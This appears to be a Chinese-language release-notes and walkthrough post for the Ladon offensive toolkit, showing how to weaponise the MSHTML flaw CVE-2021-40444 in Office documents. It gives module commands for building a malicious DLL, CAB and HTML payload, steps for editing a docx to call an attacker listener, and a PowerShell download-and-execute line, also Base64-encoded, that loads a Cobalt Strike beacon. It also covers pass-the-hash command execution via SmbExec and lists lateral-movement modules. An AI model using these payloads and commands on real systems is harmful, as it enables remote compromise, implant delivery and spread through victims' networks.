漏洞概述
中原標準時間9月8日,綠盟科技CERT監測到微軟釋出安全通告披露了Microsoft MSHTML 遠端代碼執行漏洞,攻擊者可通過制作惡意的 ActiveX 控件供托管浏覽器呈現引擎的 Microsoft Office文檔使用,成功誘導使用者打開惡意文檔後,可在目标系統上以該使用者權限執行任意代碼。微軟在通告中指出已檢測到該漏洞被在野利用,請相關使用者采取措施進行防護。
MSHTML(又稱為Trident)是微軟旗下的Internet Explorer 浏覽器引擎,也用于 Office 應用程式,以在 Word、Excel 或 PowerPoint 文檔中呈現 Web 托管的内容。AcitveX控件是微軟COM架構下的産物,在Windows的Office套件、IE浏覽器中有廣泛的應用,利用ActiveX控件即可與MSHTML元件進行互動。
影響版本
包括Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
Ladon8.9更新功能
Ladon 8.9 2021.9.14
[+]CVE-2021-40444 Microsoft MSHTML遠端代碼執行漏洞,Office文檔利用子產品
影響版本: 包括Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
[+]CmdDll cmd轉DLL(Win系統0day漏洞DLL執行指令payload,可直接powershell上線CobaltStrike)
溢出漏洞如MS17010、本地提權CVE-2021-1675等,非溢出如最新的Office漏洞CVE-2021-40444等
Ladon 8.8 2021.911
[+]SmbExec NTLM-HASH非互動執行無回顯
[u]GetInfo 新增Vmware虛拟機資訊
[u]OsScan 新增識别Vigor Router路由器識别
[u]新增Xen\VBOX\Hybrid\Parallels虛拟機識别
[+]GetInfo 新增cmdkey、RrpLog、安裝驅動、軟體清單、最近通路檔案等
[+]GetInfo 新增GUID、CPUID、硬碟ID、自啟動後門檢測(DLL卻持、系統資料庫等)
[+]GetInfo2 新增WMI更新檔資訊擷取
[+]預設資訊 新增C槽剩餘空間資訊小于2G高亮提示
ladon8.9子產品用法
CmdDLL用法
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
請根據實際需要使用對應CMD指令生成DLL,例子為彈電腦
CVE-2021-40444用法
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
PS:此子產品需使用Ladon40.exe
CVE-2021-40444複現
測試環境
Win10 x64
0ffice 2019
安裝Office2019
随便找個試用版就可以了,沒必要激活,如果下的是IMG把IMG改為ZIP解壓安裝即可。
CmdDll生成dll
CVE-2021-40444 MakeCab将DLL轉成CAB
由于目标是Win10 X64系統,是以我們使用64位的DLL,指令:Ladon CVE-2021-40444 MakeCab sc64.dll
CVE-2021-40444 MakeHtml生成Poc.html
生成html,URL需指向Ladon監聽的位址
啟動web監聽
doc樣本修改
樣本9月10号已發在小密圈,docx字尾改為cab或zip,即可編輯rels檔案,指向Ladon監聽的位址poc.html,儲存再改名為.docx
彈電腦示範
在win10上執行doc檔案時,可通過Ladon監聽看到整個請求過程,docx先通路html,由漏洞觸發加載我們封裝的CAB檔案,通過CPL執行安裝INF,加載我們的DLL,示範DLL功能為彈電腦。
Cobalt Strike上線
Base64加密
LadonGui—Encode–Base64Unicode加密
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.250.25:80/a'))"
PS: 其它複雜CMD語句同理
生成DLL
Ladon.exe CmdDll b64x64 cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyADUAMAAuADIANQA6ADgAMAAvAGEAJwApACkAIgA=
CS上線示範
SmbExec用法
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
SmbExec執行
在Cobalt Strike的shell下執行SmbExec需要帶空格引号參數時,CS轉義有問題,使用正常CMD指令比較麻煩,是以我增加了個b64cmd參數便于在CS下使用(這個方法在幾個月前的BypassUac裡使用,很多人不知道為什麼這樣做,直接CMD指令不好嗎,非要經過一步加密,當你要執行的CMD指令含有很多轉義時你就知道了,得經過CS轉義成CMD轉義得到正常CMD很麻煩)。b64cmd指令可通過LadonGUI 8.2以後版本使用Base64Unicode加密生成
執行結果
Ladon其它橫向移動子產品
ID | 子產品名稱 | 功能說明 | 用法 |
---|---|---|---|
1 | WmiExec | 135端口執行指令 | http://k8gege.org/Ladon/WinShell.html |
2 | PsExec | 445端口執行指令 | http://k8gege.org/Ladon/WinShell.html |
3 | AtExec | 445端口執行指令 | http://k8gege.org/Ladon/WinShell.html |
4 | SshExec | 22端口執行指令 | http://k8gege.org/Ladon/WinShell.html |
5 | JspShell | Jsp一句話執行指令 | http://k8gege.org/p/ladon_cs_shell.html |
6 | WebShell | WebShell執行指令 | http://k8gege.org/Ladon/webshell.html |
7 | WinrmExec | 5895端口執行指令 | http://k8gege.org/Ladon/WinrmExec.html |
8 | SmbExec | 445端口HASH執行指令 | http://k8gege.org/Ladon/SmbExec.html |
Ladon下載下傳
PowerLadon: https://github.com/k8gege/PowerLadon
曆史版本: http://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.9版本:K8小密圈